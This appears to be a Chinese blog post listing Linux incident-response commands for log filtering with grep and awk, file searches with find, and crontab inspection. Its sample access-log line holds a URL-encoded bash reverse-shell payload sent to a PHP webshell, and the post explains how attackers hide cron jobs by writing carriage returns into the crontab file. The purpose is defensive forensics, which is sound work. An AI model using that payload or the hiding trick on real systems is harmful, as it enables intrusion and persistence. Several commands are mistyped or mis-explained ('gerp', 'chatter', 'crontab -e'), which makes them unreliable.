首页 > 系统相关 >应急响应命令(Linux)

应急响应命令(Linux)

时间:2024-07-12 21:08:49浏览次数:12  
标签:文件 php grep xxx access 响应 Linux 应急 find

netstat -anultp  查看进程(用来判断开启了哪些服务等)
ls -al  查看目录下所有文件,包括隐藏文件
ls -alt  查看目录下所有文件,包括隐藏文件,按时间顺序排序
cat  access.log  |  wc -l  查看文件的行数  wc -l是查看文件行数的意思
cat  -e  access.log | grep  1.php  查找accsee.log文件中含有关键字1.php的行
cat  access.log  | grep  -a  1.php 这俩用处一样
awk正则匹配过滤文本命令

参考文章
https://blog.csdn.net/weixin_44657888/article/details/134817128

awk [参数] [处理内容] [操作对象] 

例如,access.log日志每行如下
192.168.1.7 - - [24/Apr/2022:15:27:32 +0000] "GET /data/avatar/1.php?2022=bash%20-i%20%3E&%20/dev/tcp/192.168.1.7/1234%200%3E&1 HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"$
访问者ip 时间 请求头 请求路径 URL http版本 状态码  长度
awk  '{print $1}'  access.log  此命令为匹配字段为1的数据并只显示字段为1的数据 
即可筛选出所有IP
grep -v 反选目标
awk '{print $1 $4 $7}' access.log.1 | grep -v 192.168.1.7

 

grep命令
gerp -v  "xxx"  11.txt   反选xxx内容,反选存在xxx内容的这行

gerp -i  "xxx"  11.txt 不区分xxx的大小写

grep -n "xxx"  11.txt  查找含有xxx内容的行以及行号

grep -r "xxx"  搜寻当前目录以及子目录中所有包含xxx的行
awk '{print $1 $4 $7}' access.log.1 | grep -i 192.168.1.5 | grep "/user"

组合命令 
find命令
参考文章:
https://zhuanlan.zhihu.com/p/544622346

https://blog.csdn.net/inxunxun/article/details/128164047

https://blog.csdn.net/feyehong/article/details/135829108

find . 或者 find  都是搜当前目录

find . -type -f  -perm 777  查找权限为777的文件

find .  -name  "*.php"  ! -perm 664
找出当前目录下权限不是644的php文件,感叹号是反选

find  -path  指定路径查找文件

find  -name "xxx*" 查找当前目录文件名字xxx开头的文件

find查找时间对应的文件

time单位为天   min单位为分钟
-atime  -amin  xx天/分钟访问过的文件   access
-ctime  -cmin   xx天/分钟改变文件状态的文件   change  
-mtime  -mtim  xx天/分钟改变文件内容的文件   modify

find .  -type  f   -atime -7
查找最近七天内被访问的文件

find . -type f  -atime 7
查找七天前被访问过的所有文件

find . -type f -atime +7
搜索超过七天被访问过的所有文件

-mtime 0表示查找在今天内被修改过的文件,-mtime -1表示查找在过去一天内被修改过的文件

我们通过stat来判断文件时间信息,当我们再用echo进行重新写入的时候发现文件时间更改了,这里是要注意的点,因为我们有时候需要保证文件时间信息,当你查看文件或者误操作导致文件时间进行了修改那么可能对于对文件判断会有一些操作花费更多的时间,所以这里需要注意。


发现确实是一句话木马文件,我们如果害怕对文件内容不小心做出修改我们也可以使用如下命令进行文件备份操作,使用chattr进行文件锁死,防止文件传播复制。

cp  muma.php   muma.php.bak

chatter muma.php.bak
crontab -l  查看所有定时任务
crontab -e   查看所有定时任务的隐藏任务
定时任务在/etc/crontab 文件
当前用户的crontab任务列表配置文件。当然也可以直接打开,路径通常是在/var/spool/cron/下,文件以用户名命名,如/var/spool/cron/root
查看隐藏定时任务参考文章:https://cloud.tencent.com/developer/article/2388738
原理:前面已经说过执行crontab -l其实就是执行“cat /var/spool/cron/crontabs/当前登录用户的用户名”,而cat命令自身存在一定缺陷,它会自动识别转义字符,比如执行命令printf "123\r" > 1.txt,
执行完成后使用cat命令读取该文件,如图1-5所示,可以看到无法读取123,只有Vim才可以看见文件的内容,如图1-6所示。那么,攻击者可以利用这个特性,写入一个无法被crontab -l获取的计划任务。

 



 

标签:文件,php,grep,xxx,access,响应,Linux,应急,find
From: https://www.cnblogs.com/sdgfsdgfsd/p/18299354

相关文章

  • Linux入门---(一)
    VIM编辑器1.一般模式:2.编辑模式3.命令模式:%s/old/new/g替换当前匹配到的所有old为new小tips:......
  • 【Linux】Linux操作系统
    Linux基本指令os概念与定位本节内容:Linux操作系统讲解os概念与定位操作系统(OperatingSystem,简称OS)是管理和控制计算机硬件与软件资源的计算机程序。总的来讲,操作系统是一款做软硬件管理的软件。了解操作系统的同时,需要对计算机上的其他部分有一定的了解:从硬......
  • Linux 使用结构化命令--练习
    练习一用elif语句为某用户创建账户检查该用户名是否存在,如果存在返回“该用户已存在”,并输出该用户的信息如果不存在,检查/home下是否有该用户的文件夹如果有该用户名称的文件夹,输出文件夹下内容如果没有该用户文件夹,为该用户名创建新用户每一步都需要返回提示信息如“该用户......
  • Linux命令行之文本处理awk
    处理有分隔符的文本文档,默认分隔符是空格。awk的一些内置变量NF:字段数量(NumberofFields)NR:当前记录号(NumberofRecords)$0:当前记录(整行)$1,$2,...:当前记录的第1个、第2个等字段FS:字段分隔符(FieldSeparator),默认为空格或制表符OFS:输出字段分隔符(OutputFieldSeparator),默......
  • 玄机-应急响应-vulntarget-k-01
    题目描述:应急响应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查!根据题目环境简单分析,此道题目是一个中型环境,但由于题目本身只是针对于redis第一步环境,题目设置思路为应急人员重走攻击路径,还原攻击路径,适用于快速确定受害主机漏洞情况,与常规上机排查不一样,......
  • Linux下IIO子系统驱动
    1引入IIO子系统随着手机、物联网、工业物联网和可穿戴设备的爆发,传感器的需求越来越多。比如手机或者手环里面的加速度计、光传感器、陀螺仪、气压计、磁力计等,这些传感器本质上都是ADC。这些传感器对外通过IIC或者SPI接口来发送ADC转换后的原始数据。Linux内核为了管理......
  • Linux下PWM子系统
    1pwm子系统框架内核态分为:pwmcore:pwm_chip的添加删除,pwm_class类pwm_chip/pwm_device的sysfs创建。pwmdriver:pwm_chip对象实例,注册添加到pwmcore。 pwm_chip可以包含一个或多个pwm_device,每个pwm_device通过设置不同pwm_state来达到目的。1.1源码结构drivers/pwm/......
  • Linux捣鼓记录:debian12解决用户无法执行sudo,提示不是 sudoers 文件
    问题:dalong@debian:~$sudoaptupdate[sudo]dalong的密码:dalong不是sudoers文件。当你尝试使用sudo命令并收到"dalong不是sudoers文件"的错误信息时,这意味着用户dalong没有被配置为可以使用sudo命令。在Debian和其他基于Debian的系统中,sudo的权限是由......
  • Rocky Linux/Redhat8运行Calibre2022报错:Software tree is for environment VCO=aoj
    运行出现了错误:virserver.tclerror:ERROR:CurrentexecutionenvironmentisVCO=aok.SoftwaretreeisforenvironmentVCO=aoj。即calibre软件版本为aoj,但当前的环境是aok。从官网查询calibre的roadmap:http://calibre.mentorcloudservices.com/docs/Calibre_OS_Roadmap.......
  • Linux 外挂磁盘
    1.查看PC磁盘lsblk-f结果:NAMEFSTYPELABELUUIDMOUNTPOINTsdb└─sdb1ext4b5ae9dca-7e36-4ed9-8090-08415f9bb5......